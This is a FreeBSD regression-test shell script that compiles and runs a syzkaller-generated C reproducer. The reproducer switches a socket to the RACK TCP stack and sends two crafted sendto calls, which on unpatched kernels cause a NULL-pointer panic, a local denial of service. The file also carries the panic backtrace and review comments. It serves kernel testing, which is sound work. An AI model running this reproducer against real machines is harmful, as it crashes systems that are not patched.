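#!/bin/sh

# Regression test: a syzkaller-generated reproducer that drove the RACK TCP
# stack into a NULL-pointer panic from an unprivileged sendto(2), i.e. a local
# kernel denial of service.  The original report:
#
# panic: sbsndptr_noadv: sb_mb is NULL
# cpuid = 0
# time = 1586867804
# KDB: stack backtrace:
# db_trace_self_wrapper() at db_trace_self_wrapper+0x47/frame 0xfffffe0025a68360
# vpanic() at vpanic+0x1c7/frame 0xfffffe0025a683c0
# panic() at panic+0x43/frame 0xfffffe0025a68420
# sbsndptr_noadv() at sbsndptr_noadv+0xae/frame 0xfffffe0025a68460
# rack_output() at rack_output+0x51f5/frame 0xfffffe0025a68700
# tcp_usr_send() at tcp_usr_send+0x5c7/frame 0xfffffe0025a687e0
# sosend_generic() at sosend_generic+0x8fd/frame 0xfffffe0025a688e0
# sosend() at sosend+0xc6/frame 0xfffffe0025a68950
# kern_sendit() at kern_sendit+0x33d/frame 0xfffffe0025a68a00
# sendit() at sendit+0x224/frame 0xfffffe0025a68a60
# sys_sendto() at sys_sendto+0x5c/frame 0xfffffe0025a68ac0
# amd64_syscall() at amd64_syscall+0x262/frame 0xfffffe0025a68bf0
#
# NOTE(review): the reproducer never checks the setsockopt(2) return value, so
# on a kernel where the "rack" TCP stack is not loaded the test silently
# exercises the default stack and proves nothing — confirm tcp_rack is
# available before relying on a pass.

# The reproducer assumes a 64-bit address layout; skip on i386.
[ "$(uname -p)" = "i386" ] && exit 0

. ../default.cfg

# Quoted heredoc delimiter: nothing in the C source should be shell-expanded.
cat > /tmp/syzkaller10.c <<'EOF'
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* syzkaller resource table: r[0] holds the socket fd (or -1 if socket() failed). */
uint64_t r[1] = {0xffffffffffffffff};

int
main(void)
{
	/*
	 * Map a fixed scratch region at 0x20000000 that the generated syscall
	 * arguments below point into (prot 3 and flags 0x1012 are the raw
	 * values emitted by syzkaller; presumably RW, MAP_FIXED|MAP_PRIVATE|
	 * MAP_ANON on FreeBSD — verify against sys/mman.h).
	 */
	syscall(SYS_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x1012ul, -1, 0ul);

	intptr_t res = 0;
	/* AF_INET (2), SOCK_STREAM (1) TCP socket. */
	res = syscall(SYS_socket, 2ul, 1ul, 0);
	if (res != -1)
		r[0] = res;

	/*
	 * 36-byte option payload: a 32-byte NUL-padded stack name "rack"
	 * followed by a 32-bit count of 0.  Level 6 is IPPROTO_TCP; option
	 * 0x2000 selects the TCP function block — this is what switches the
	 * socket onto the RACK stack whose rack_output() appears in the panic
	 * backtrace.  The return value is deliberately not checked (see the
	 * review note in the shell wrapper).
	 */
	memcpy((void*)0x20000080,
	    "rack\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
	    "\000\000\000\000\000\000\000\000\000\000\000\000", 32);
	*(uint32_t*)0x200000a0 = 0;
	syscall(SYS_setsockopt, r[0], 6, 0x2000, 0x20000080ul, 0x24ul);

	/*
	 * First sendto: empty payload to a sockaddr with sa_len 0x2c, AF_INET,
	 * port 0x4e21, address 0xffffffff (all-ones), 16-byte addrlen.
	 */
	*(uint8_t*)0x20000000 = 0x2c;
	*(uint8_t*)0x20000001 = 2;
	*(uint16_t*)0x20000002 = htobe16(0x4e21);
	*(uint32_t*)0x20000004 = htobe32(-1);
	*(uint8_t*)0x20000008 = 0;
	*(uint8_t*)0x20000009 = 0;
	*(uint8_t*)0x2000000a = 0;
	*(uint8_t*)0x2000000b = 0;
	*(uint8_t*)0x2000000c = 0;
	*(uint8_t*)0x2000000d = 0;
	*(uint8_t*)0x2000000e = 0;
	*(uint8_t*)0x2000000f = 0;
	syscall(SYS_sendto, r[0], 0ul, 0ul, 0ul, 0x20000000ul, 0x10ul);

	/*
	 * Second sendto: again an empty payload, this time with flags 0x60005
	 * (raw syzkaller value; the low bit is MSG_OOB) to a well-formed
	 * 16-byte AF_INET sockaddr with address 0.  This is the call that
	 * reaches rack_output() -> sbsndptr_noadv() with an empty send buffer.
	 */
	*(uint8_t*)0x20000040 = 0x10;
	*(uint8_t*)0x20000041 = 2;
	*(uint16_t*)0x20000042 = htobe16(0x4e21);
	*(uint32_t*)0x20000044 = htobe32(0);
	*(uint8_t*)0x20000048 = 0;
	*(uint8_t*)0x20000049 = 0;
	*(uint8_t*)0x2000004a = 0;
	*(uint8_t*)0x2000004b = 0;
	*(uint8_t*)0x2000004c = 0;
	*(uint8_t*)0x2000004d = 0;
	*(uint8_t*)0x2000004e = 0;
	*(uint8_t*)0x2000004f = 0;
	syscall(SYS_sendto, r[0], 0ul, 0ul, 0x60005ul, 0x20000040ul, 0x10ul);
	return 0;
}
EOF

# mycc comes from default.cfg; a compile failure aborts the test (exit 1).
mycc -o /tmp/syzkaller10 -Wall -Wextra -O2 /tmp/syzkaller10.c -lpthread || exit 1

# Run detached, give a vulnerable kernel time to panic, then clean up whatever
# is left.  On a fixed kernel the reproducer simply returns and the test passes.
(cd /tmp; ./syzkaller10) &
sleep 60
pkill -9 syzkaller10
wait

rm -f /tmp/syzkaller10 /tmp/syzkaller10.c /tmp/syzkaller10.core
exit 0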